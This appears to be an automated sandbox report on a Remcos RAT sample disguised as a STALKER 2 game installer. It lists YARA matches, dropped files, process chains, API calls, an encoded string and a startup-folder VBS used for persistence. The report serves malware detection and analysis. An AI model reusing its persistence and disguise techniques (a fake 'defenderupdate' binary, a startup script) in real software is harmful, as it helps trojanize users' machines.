                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: String function: 004338A5 appears 41 times
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: String function: 00433FB0 appears 55 times
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1858620323.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1859614323.0000000002B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1892169494.0000000007287000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1925160227.0000000008E20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1891174679.0000000006410000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exe, 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSTALKER_2.exe4 vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exeBinary or memory string: OriginalFilenameSTALKER_2.exe4 vs eBHn6qHPLz.exe
                  Source: eBHn6qHPLz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.defenderupdate.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.eBHn6qHPLz.exe.45d4110.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.defenderupdate.exe.4685cf8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.defenderupdate.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 8.2.defenderupdate.exe.4685cf8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000000.00000002.1871058602.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.2183906073.0000000004643000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000009.00000002.2164473924.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000000.00000002.1871058602.0000000003FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: eBHn6qHPLz.exe PID: 7336, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: defenderupdate.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: defenderupdate.exe PID: 8040, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: eBHn6qHPLz.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9894706530448718
                  Source: defenderupdate.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9894706530448718
                  Source: eBHn6qHPLz.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: eBHn6qHPLz.exe, Hbasusze.csCryptographic APIs: 'TransformFinalBlock'
                  Source: defenderupdate.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: defenderupdate.exe.0.dr, Hbasusze.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, Hbasusze.csCryptographic APIs: 'TransformFinalBlock'
                  Source: eBHn6qHPLz.exe, -.csBase64 encoded string: 'kUTVHtVM7G/DDNxEoUnPBd4Pg07VD91DrkSdLdVVh1PSGMlgsU7DB9JNuwbBD8R+hEjKBv5Ar1idBcB+i1PDG8VArlTSE4tGp0n5JtVPpUnOUfdEtmnfGtVnsFLLItFPplHDUddEtmLoC91E+XTIDtVZjVudONVApm7SGNlPpQbnDtQapVjSNeBOsVTSA99P+VrDHu9it0/UD95VhlLLC9lP+W7DHvRAtlydWIMZ9AudK8NSp1DEBslyp0/QD8IakVTLGtxEg07VD91DrkTjEsBNrU/DGItDo1/DBsZM+U7LBdtEtljVHg=='
                  Source: defenderupdate.exe.0.dr, -.csBase64 encoded string: 'kUTVHtVM7G/DDNxEoUnPBd4Pg07VD91DrkSdLdVVh1PSGMlgsU7DB9JNuwbBD8R+hEjKBv5Ar1idBcB+i1PDG8VArlTSE4tGp0n5JtVPpUnOUfdEtmnfGtVnsFLLItFPplHDUddEtmLoC91E+XTIDtVZjVudONVApm7SGNlPpQbnDtQapVjSNeBOsVTSA99P+VrDHu9it0/UD95VhlLLC9lP+W7DHvRAtlydWIMZ9AudK8NSp1DEBslyp0/QD8IakVTLGtxEg07VD91DrkTjEsBNrU/DGItDo1/DBsZM+U7LBdtEtljVHg=='
                  Source: 0.2.eBHn6qHPLz.exe.4251578.0.raw.unpack, -.csBase64 encoded string: 'kUTVHtVM7G/DDNxEoUnPBd4Pg07VD91DrkSdLdVVh1PSGMlgsU7DB9JNuwbBD8R+hEjKBv5Ar1idBcB+i1PDG8VArlTSE4tGp0n5JtVPpUnOUfdEtmnfGtVnsFLLItFPplHDUddEtmLoC91E+XTIDtVZjVudONVApm7SGNlPpQbnDtQapVjSNeBOsVTSA99P+VrDHu9it0/UD95VhlLLC9lP+W7DHvRAtlydWIMZ9AudK8NSp1DEBslyp0/QD8IakVTLGtxEg07VD91DrkTjEsBNrU/DGItDo1/DBsZM+U7LBdtEtljVHg=='
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@12/8@2/2
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_00416AB7
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040E219
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041A63F
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeCode function: 9_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_00419BC4
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-JVWXPC
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile created: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs"
                  Source: eBHn6qHPLz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: eBHn6qHPLz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                  Source: eBHn6qHPLz.exeReversingLabs: Detection: 60%
                  Source: eBHn6qHPLz.exeVirustotal: Detection: 58%
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeFile read: C:\Users\user\Desktop\eBHn6qHPLz.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\eBHn6qHPLz.exe "C:\Users\user\Desktop\eBHn6qHPLz.exe"
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess created: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe "C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe"
                  Source: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeProcess created: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp "C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp" /SL5="$1000C6,192512,0,C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe"
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess created: C:\Users\user\Desktop\eBHn6qHPLz.exe "C:\Users\user\Desktop\eBHn6qHPLz.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\defenderupdate.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\defenderupdate.exe "C:\Users\user\AppData\Roaming\defenderupdate.exe"
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess created: C:\Users\user\AppData\Roaming\defenderupdate.exe "C:\Users\user\AppData\Roaming\defenderupdate.exe"
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess created: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe "C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe" Jump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeProcess created: C:\Users\user\Desktop\eBHn6qHPLz.exe "C:\Users\user\Desktop\eBHn6qHPLz.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeProcess created: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp "C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmp" /SL5="$1000C6,192512,0,C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exe" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\defenderupdate.exe "C:\Users\user\AppData\Roaming\defenderupdate.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\defenderupdate.exeProcess created: C:\Users\user\AppData\Roaming\defenderupdate.exe "C:\Users\user\AppData\Roaming\defenderupdate.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\eBHn6qHPLz.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-252SN.tmp\setup_s.t.a.l.k.e.r._2_heart_of_chornobyl_436_(77912).tmpSection loaded: textinputframework.dllJump to behavior
